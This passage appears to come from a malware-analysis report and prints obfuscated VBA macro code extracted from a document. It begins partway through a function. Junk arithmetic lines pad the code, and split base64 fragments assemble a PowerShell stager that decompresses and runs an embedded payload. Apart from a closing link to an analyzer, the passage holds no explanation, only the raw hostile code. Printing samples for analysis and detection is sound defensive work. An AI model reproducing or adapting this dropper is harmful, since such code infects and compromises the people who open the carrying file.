OIqOY = Hex(VUfaN + Hex(Vbvmci) * 49817 + Round(FAWnf))
nLVHzi = Cos(jfuisM)
TVkwGv = CDate(iJMAY)
LPNmD = Cos(uWJzYb)
mkXzJiZZwdz = "ZgAvAHQAWABSAHA" + "AQwBVA" + "HUAZQBJAFAAR" + "QBYAHoASwA0AEsA" + "aQBZAHIAaQ" + "B3AEgA"
vpwBHj = Hex(nkkPa + Hex(jSICIG) * 53181 + Round(VQRIb))
RPJVM = Cos(XAWiH)
RBYaf = CDate(MWzcNH)
RzRZYi = Cos(fZEYbO)
nmWPqNqm = "NgBOAGs" + "AbQBMAGkA" + "eQ" + "BUAEE" + "AbgBxAHMAN" + "gBpAHkARABu" + "AEgAcABVAEcAR" + "gBBAHEAVAB" + "SAFgATwBn"
WZMXTuZ = wdpIvjEc + ZVwqGnlSaO + wwiEzTCD + mkXzJiZZwdz + nmWPqNqm
End Function
Function MzwAiX()
On Error Resume Next
EJjva = Hex(DpZtvl + Hex(vEKpB) * 3211 + Round(vVFawD))
ZrzAw = Cos(vHMPj)
NmbZYi = CDate(KzbPOW)
jHjEI = Cos(Wjiwcs)
AEWPo = "AHkAdQBvAFA" + "AUABrADkA" + "WABOAFQAWA" + "BTAHg" + "AUQB3AGkAVQBMAE" + "gAKwBsAHcAYw" + "B0A" + "HcAa" + "wBHAGEA"
VYosuJ = Hex(orTvh + Hex(LsRwbi) * 58250 + Round(jnYIG))
QhIdzf = Cos(RmIjVF)
lrnnX = CDate(ldOjW)
OXolQk = Cos(azHjpw)
iuwwEGaKjj = "cgBo" + "AGQAcQBMAHY" + "AVQBJAG" + "IAYQBTADAAb" + "wA2AHYAawB6"
PuGIP = Hex(dWnpz + Hex(kuwmSc) * 13900 + Round(RKcBs))
hiKdIz = Cos(WzrXGR)
Psjzl = CDate(ztiKpH)
ukFRFP = Cos(ZzMJj)
EzWLw = "AF" + "cAdwBoAHMAc" + "ABaA" + "EQAZQB4AGQAWQB" + "5AHkAcgBvAFAAe" + "gBmAGIAeABuA" + "GcAZQBqAGMAT" + "QB6AE4A" + "UABGAEoAM"
wOzFP = Hex(LroYa + Hex(PNznAz) * 78463 + Round(PulsZ))
rBqQf = Cos(Sjilw)
udwrG = CDate(inpBQ)
zMVfmC = Cos(FfzUKA)
BbovoaZQXhH = "wA1AFA" + "Acg" + "BOAC8AZAB6" + "AG0" + "AdQB1A"
tALjf = Hex(raFLF + Hex(oaNmc) * 79650 + Round(FRTEmw))
IquzJm = Cos(iSdcJW)
tYHKa = CDate(NCrtV)
ZvFZwY = Cos(wGAjHB)
rOPurZ = "EkAT" + "wBqAEoAVQBXAEgA" + "UABDAHAA" + "aQBXAGEAZ" + "AAzA" + "HEAaAB6AGUAdw" + "A5AFIAeQBOAE8Ac" + "QBrAEYAUQBMAEwA" + "OA" + "BKADYAS"
hFHkJ = Hex(SiLtM + Hex(MiSFzB) * 53214 + Round(MudthE))
XvsrzI = Cos(hIvHj)
LrkLM = CDate(MBjBB)
jWGmbO = Cos(EsumT)
AZzvEzEqwJ = "AB" + "HAFMAVABtAGIA" + "NAB5AC8AbwBOA" + "GcA" + "RwB3AGg" + "AWAB1AEsAQgBh"
MzwAiX = AEWPo + iuwwEGaKjj + EzWLw + BbovoaZQXhH + rOPurZ + AZzvEzEqwJ
End Function
Function jTJBQjBtJwj()
On Error Resume Next
NmEBK = Hex(rRYSU + Hex(RjfsY) * 84003 + Round(qMTlAu))
jEiKRF = Cos(KzPHA)
rJOHE = CDate(bKhXMT)
rcptA = Cos(Gdcnm)
IwDTJa = "ADYANQBBAGQAdA" + "BkAHUAdAAwADYA" + "WQBIAFIAcwB" + "sAHMASwBIADkAM" + "AB" + "WAEYAOQBuA" + "FAAbwBLA" + "EsASABiAEQAdw"
BPtHj = Hex(kYVDh + Hex(LhOSWz) * 62249 + Round(qNOpU))
PDtsO = Cos(csCXi)
AIbvh = CDate(uriTpn)
dHUXn = Cos(EmbAh)
WqiVQSrKod = "BMAGYAVAAxAGIAO" + "QBmADMASABCAG" + "MAWQB4AGgATg" + "B0AEU" + "AR"
dpLWSi = Hex(kTwXqv + Hex(audXvN) * 11409 + Round(kOHVOW))
QZIuQD = Cos(jVPpzD)
fjdcHZ = CDate(IDETZ)
EwOzPV = Cos(CYPvf)
NdLXa = "QBSAG" + "UAQ" + "wB4AEk" + "ATABqADgATQ" + "BuAEoAaABYAGI" + "AS" + "gBWAFIAZ"
cKIIGQ = Hex(wEfis + Hex(wSHVD) * 51537 + Round(LtnHRZ))
vlHUhz = Cos(zzAvwD)
wARjE = CDate(YovCL)
oRiXB = Cos(jnHKwK)
rRzvrIm = "gBrADEAbQB1" + "AGQ" + "AOABI" + "AHkAagBuAGEAcQ" + "AwAEQARAB1AH" + "kA" + "UQBMAC8AWQ" + "BQADYAcwBVAH"
vbwTHa = Hex(XVOtW + Hex(MQDHq) * 10030 + Round(MJOPc))
ERQOlD = Cos(nJhaV)
bFzSCp = CDate(iiQjA)
rBjmM = Cos(qIWnHG)
VhWfZBj = "oASgBTAFQAVwB" + "2A" + "DEAUQAvAFoAcgB" + "XAG8AOQBUAE" + "EA" + "awBPAE4AdgB0" + "AEUAQwBy"
pPjDid = Hex(CdDOqM + Hex(aUaBj) * 28356 + Round(LEEXV))
iiFSqM = Cos(zlubh)
OROwU = CDate(AJQowl)
rLdLff = Cos(nGYXk)
WtDTlD = "AGQA" + "MQBOADQAOAB5AGI" + "AegBP" + "AEsATg" + "BBAEIATAA1" + "ADIAaABs" + "AEoAMgBNAGk"
dmapZ = Hex(UbAzzG + Hex(bUjOqJ) * 62630 + Round(VNVaP))
TRHtqN = Cos(SNjaOz)
zrMjF = CDate(EsGshN)
HIZEO = Cos(DBJsG)
lzdvTi = "AMQBKAFIA" + "YQA4AD" + "gA" + "KwA1AEMAWQB" + "FAFYAUwBLAC8ANw" + "BvAEYAMgBDAE" + "sAOABX" + "AGIAegBEAFE"
snIHz = Hex(bMPRiB + Hex(VSqaLP) * 22295 + Round(JoKoiM))
uPpzG = Cos(MJwlI)
GBoqi = CDate(PtrMa)
cuijwz = Cos(TbXSz)
ZKEjnHHp = "APQA" + "9A" + "CcA" + "KQAgACwAWwBJAG" + "8AL" + "gBjAE8ATQBwA" + "FIAZQBzAFMA"
jTJBQjBtJwj = IwDTJa + WqiVQSrKod + NdLXa + rRzvrIm + VhWfZBj + WtDTlD + lzdvTi + ZKEjnHHp
End Function
Function hDJrzqizz()
On Error Resume Next
ivPIJu = Hex(CLFbUz + Hex(QPSMhp) * 83518 + Round(LvdKw))
pcijp = Cos(zczlh)
lvQpC = CDate(ARCDJ)
kKkHj = Cos(fzwWM)
ZMVOVsmCBA = "aQBPAG4ALgBDA" + "E8A" + "bQBwAFIAZQBTAHM" + "AaQBvAE4ATQBvAG" + "QAZQBdADoAOg" + "BkAEUAYwBvAG0Ac" + "AByAEUAUwBzACAA" + "KQAgACkAIAAsAC"
Wrfjho = Hex(hiQDv + Hex(WsOJj) * 32220 + Round(TXziir))
iFiVPj = Cos(SKkRkN)
bjUHoA = CDate(cRpPF)
PwsAEp = Cos(kbwunM)
fDpFv = "AAW" + "wB0A" + "EUAeAB" + "0AC4ARQBuAEMA" + "TwBEAEkATgBnAF0" + "AOgA6AG" + "EAUwBDA"
Dhdsw = Hex(zrrfX + Hex(qiCosG) * 19485 + Round(STSjM))
RDAjZT = Cos(bKunwS)
dXGNc = CDate(wRinD)
dDGjPu = Cos(BlurIF)
BWwuCmN = "EkAaQApA" + "CAAKQAuA" + "HIAZQBhAEQAdABP" + "AG" + "UATgBEACgA"
NPUHA = Hex(nHfuMF + Hex(zwzVN) * 61747 + Round(pZVaft))
QQjjw = Cos(YCjza)
HAVXMW = CDate(mjFlY)
cUOntu = Cos(HfWrwN)
wOllrL = "IAApACAA"
hDJrzqizz = ZMVOVsmCBA + fDpFv + BWwuCmN + wOllrL
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.